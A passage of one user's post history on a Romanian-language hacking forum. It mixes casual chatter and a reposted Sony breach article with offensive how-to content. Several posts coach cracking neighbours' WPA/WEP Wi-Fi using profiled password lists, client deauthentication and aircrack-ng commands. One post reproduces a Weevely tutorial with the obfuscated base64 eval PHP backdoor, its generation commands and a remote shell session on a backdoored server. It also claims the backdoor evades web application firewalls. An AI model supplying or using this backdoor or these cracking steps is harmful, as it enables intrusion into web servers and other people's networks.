Jump to content

co4ie

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by co4ie

  1. Daca te uiti atent la tool-urile prezente in backtrack o s avezi ca ai destule posibilitati pt passlist! Daca incerci sa spargi un WPA si ai nevoie de un passlist custom poti folosi cupp .. e un tool genial cu care iti poti face un passlist dupa profilul unei persoane ... de exemplu un vecin.. web admin... si cu cate stii mai multe despre el cu atat mai bine (data nasterii, copii, neamuri, nr tel, adresa, poi`s..) si cu atat mai eficient/rapid vei reusi ce iti propui! Parolele de obicei sunt slabe si se reflecta in viata de zi cu zi a persoanelor ... asta in cazul in care nu-s paranoia cu securitatea!!
  2. co4ie

    Cisco ccie

    Ai grija ca in romania nu e ca in Vest... cu greu si dupa multi ani o sa prinzi un job in care sa te icupi exclusiv de o retea... Daca urmaresti cu atentie cerintele pt joburi in domeniu o sa vezi ca se cere sa stii de toate, sa faci de toate (inclusiv sa te ocupi de srv web ,maintenanta la echipamente si suport tehnic la calc din retea...) + sa ai experienta cativa ani!! Sunt foarte bune modulele si chiar simpla prezenta in cv pot face diferenta la angajare! Bafta multa !!
  3. Pai inseamna ca tu incerci sa spargi o protectie wep... 80k IV's (desi poti sparge lejer si cu 40k) ar avea cam 10mb maxim dupa un calcul rapid (dar nu exact la ora asta)! Backtrack e o distributie de linux.. sa il inchizi dai logout si scrii poweroff in consola.. Ia si invata comenzile de linux!!
  4. Bine zis Zatarra... Chiar nu ar strica sa postezi legislatia in vigoare si mai ales metodologia de aplicare a legii... multi nu stiu ca exista si asa ceva si mai mult habar nu au ca ce scrie in lege poate si complet diferit dupa metodologia de aplicare !! Bine ai venit ... iar daca ai clienti pt carding si alte magarii de genul eu zic sa ii infunzi cu mana ta ca sa fii sigur ca ajung unde trebuie !
  5. nu stiu ... eu folosesc backtrack si am passlist-ul lui ... Poti gasi o colectie de passlit-uri AICI
  6. co4ie

    Cisco ccie

    Cred ca 3 ani se refera la asociatii Cisco... desi in ritmul in care se schimba tehologiile in ziua de azi nu mar mira sa scrie pe Certificatul ala ca e valabil 3 ani ! Ca sa faci CCNA ar fi bine sa fii foarte familiarizat cu termenii din it si/sau sa ai si modulele premergatoare acestuia ! La Comptia mi se pare ca nici nu poti accesa modulele mai avansate daca nu le ai luate pe celelalte. La anul o sa a apuc si eu de CNNA si Network+ ... momentan ma cert cu licenta !! By the way Nytro ... dami in pm cu id-ul tau te rog !!
  7. Dictionarul asta are 17+mb... si imi merge la 1000+k/s ...deci nu`i asa mare diverenta + ca sunt mult alte tool-uri care cred ca fac si mai repede (dar din lipsa de ocupatie si din plictiseala nu le-am incercat) Cred ca tu te referi la IV`s ... la pachetele capturate ...daca e asa .. am numai un fisier de test... cu 485 IV`s si are 58.7 Kb ... tre sa sari de 15-18000 IV`sa poti sparge wep`ul lejer !!
  8. Late last night Sony?s Chief Information Security Officer, Philip Reitinger, released a statement on the PlayStation Blog informing users that Sony detected a massive hacking attempt. According to Sony, the hackers obtained a large amount of user data from other companies or websites. The hackers were attempting to sign-in to numerous accounts using ID and password pairs, and while the ?overwhelming majority of the pairs resulted in failed matching attempts? there were still approximately 93 thousand accounts (globally) in which the hackers succeeded. Of those 93 thousand accounts, 60 thousand were PSN accounts and 33 thousand were SOE accounts. Reitnger had this to say regarding the hacked accounts: Those with compromised accounts will be contacted and will be forced to reset their passwords. While we don?t know how many accounts the hackers tried to get into, 93 thousand accounts isn?t a small number. Yes, compared to the number of active PSN accounts it might seem small, but 93 thousand people were affected by this and that?s nothing to dismiss. At least Sony seems to be preventing some of the attacks after their system was shut down a few months ago, but it does seem that hackers are increasing their attacks on video game consoles as their security may be easier to circumvent. While I?m sure the majority of PS3 gamers were safe from this ?attack?, it might be a good idea to change your password either way, or at least remove the any credit card information on file. That way if they do hack into your account, they won?t be able to get anything from you. Click the source link below if you would like to read the entire press release. Sursa
  9. captura de pachete faci doar in cazul retelelor protejate cu WEP !!! La cele cu WPA trebuie sa capturezi handshake intre un client si ap... pt asta trebuie sa intri in monitor mode , sa incepi captura , sa deautentifici clientul deja conectat la retea pt ca la reautentificare sa capturezi handshake-ul ! si dupa spargi pass cu worlist-ul preferat!! Aircrack-ng 1.1 r1904 [00:23:18] 1144843 keys tested (684.39 k/s) Current passphrase: zwitterion Master Key : 99 CC 91 3C 9C DA 7E 43 B1 E5 51 C2 98 2B 77 CC B6 95 D1 28 BE DA 92 CD 10 97 C6 E2 AF 8C 42 FB Transient Key : 1B 0E FF 94 48 C8 61 E7 CC 3E A1 89 E6 8D BD BE 88 4C 19 F5 F6 43 22 49 83 69 6C 46 F2 FE 2C 8E 17 73 4E 88 AD 75 38 A0 F8 0A 26 B1 EF BC 33 29 E0 69 F7 DF 93 6E 3A 2C BA A2 C3 C0 60 68 14 65 EAPOL HMAC : 12 1D A6 74 D3 05 D1 18 C6 1A 37 C2 21 94 E8 5C Passphrase not in dictionary Quitting aircrack-ng... test facut acum 2 minute pe un handshake capturat in 3 minute !! Passlist-ul are peste 1500000 parole in el ... este a lui dark0de... la procesor de 1.6 dualcore 3gbram ..deci zic ca rezultatul este acceptabil !!
  10. Scuze... era altul threadul cu injectia... am gresit eu !! Nu am inteles ce vrei sa zici cu 80000:| Mie mi-a gasit pass la un test wpa un fisier de 1gb/1h cu parola mea pusa ultima in lista ...
  11. monitor mode merge... nu poate injecta pachete... e ralink 3090...ceva de genul si din cate citit eu nu merge!! Recunosc ca nici nu m-am dat peste cap cautand vre`un driver care sa suporte injectie !!
  12. Omu e ratat tare ... nu-i mai lua apararea.. si eu am fost "fan" Badea dar abereaza prea mult, minte si habar nu are despre ce cacat mananca !! intradevar stie sa intoarca cuvintele si are mult tupeu.. dar cine nu ar avea daca ar fi la tv...unde nimeni nu poate sa-l scuipe?Iti spun sigur ca banii sii ia intr-un cont la care are si card... cardul pe care il folosise atunci era cel de "vacanta" ...
  13. placa wifi nu suporta injectie...de asta ii dadea cu virgula...
  14. Iertatil ca nu stie ce spune... Badea in majoritatea cazurilor vorbeste in necunostinta de cauza !!
  15. Nytro... lasa oamenii in pace... noi cu ce ne mai distram?? Problemele se rezolva in mare dupa fiecare update...dar alea sunt doar vulnerabilitatile facute publice !!
  16. aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap asta e comanda...posibil ca aircrack sa aiba o retinere la folosirea unui passlist mai mare de 2gb...ca si john de altfel ...
  17. Cred ca tu nu`ti dai seama cat de mult cantareste logistica in balanta pretului... sa aduci telefoane din afara costa ... si destul de mult !! Cred ca e ieftin pt ca e facut la noi , nu e o "marca de pretigiu" desi cred ca daca e facut cu , cap se poate bate cu multe marci la capitolul calitate !! Cu cat mai cunoscuta firma cu atat mai scump este obiectul cumparat (vezi Iphone... costa 150$ sa il faca ... si la noi e 1000+$ WTF???)!! Bravo lor... sper sa se tina bine in piata si romanii sa aiba incredere in produsele autohtone !!
  18. totusi chiar aseara ma gandeam la un bruteforce pe tw... parolele generate automat sunt numerice si doar de 4 caractere... sunt 10000 posibilitati/500pps deci nu ar fi asa greu odata ce ii stii id`ul...
  19. co4ie

    Fun stuff

    Nu stiu daca a mai fost postata dar ... e prea tare
  20. pai... citeste despre atacurile de tip mitm... cine face arp poisoning in retea se joaca cu tot traficul...te poate redirectiona catre scampage`uri, poate face sniffing si sa`ti salte toate parolele.. sa iti redirectioneze toate paginile catre una de "update" la antivirus,adobe... si altele !! daca nu vrei sa cazi in plasa nu te mai conecta pe retelele nesecurizate... Citeste despre ettercap si ssltrip ... cel mai probabil daca face arp poisoning asa ceva foloseste... (squid mai e o posibilitate)
  21. Generate and Manage Stealth PHP backdoors Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. With weevely you can generate PHP code to trojanize a web server, this backdoor acts like a telnet client to execute commands or inject addictional function on the backdoored server. Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review. The program trying to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server. Also the backdoor server code is small and easily hideable in other PHP files, the core is dynamically crypted in order to bypass pattern matching controls. Usage: Select All Code: root@bt:/weevely# ./main.py -h Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ Usage: main.py [options] Options: -h, --help show this help message and exit -g, --generate Generate backdoor crypted code, requires -o and -p . -o OUTPUT, --output=OUTPUT Output filename for generated backdoor . -c COMMAND, --command=COMMAND Execute a single command and exit, requires -u and -p . -t, --terminal Start a terminal-like session, requires -u and -p . -C CLUSTER, --cluster=CLUSTER Start in cluster mode reading items from the give file, in the form 'label,url,password' where label is optional. -p PASSWORD, --password=PASSWORD Password of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL . Choose your password and create the backdoor: Select All Code: root@bt:/weevely# ./main.py -g -p coco -o door.php Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file 'door.php' created with password 'coco'. root@bt:/weevely# ls -al door.php -rw-r--r-- 1 root root 321 2011-10-06 00:20 door.php root@bt:/weevely# cat door.php <?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3Bh cnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J2NvJy AmJiBjb3VudCgkYSk9PTkpIHtlY2hvICc8Y28+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3Jl cGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2 hvICc8L2NvPic7fQ==')); ?> Upload the backdoor to your customers web server and try to access it: Select All Code: root@bt:/weevely# ./main.py -t -u http://www.foo.org/.../door.php -p coco Weevely 0.3 Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Using method system(). + Retrieving terminal basic environment variables . [www@server /var/www] id uid=69(www) gid=69(www) groups=69(www) [www@server /var/www] pwd /var/www Voila! Furthermore, i tried to test weevely on servers that are protected from web application firewalls (specifically by Cloudflare and Imperva) and worked fine. Download Sursa
      • 1
      • Upvote
  22. nu... te infecteaza cu toate "bolile" posibile !! Nytro, Ahead ... hai cu banul !!
  23. poti rula asta si sub linux... prin wine... doar slave`ul sa aiba windows!!
  24. e de windows...
  25. vezi daca ai router sa faci port Forwarding pe portul pe care faci srv`ul...daca nu nu o sa se conecteze in veci!! Mc nytro de rat...
×
×
  • Create New...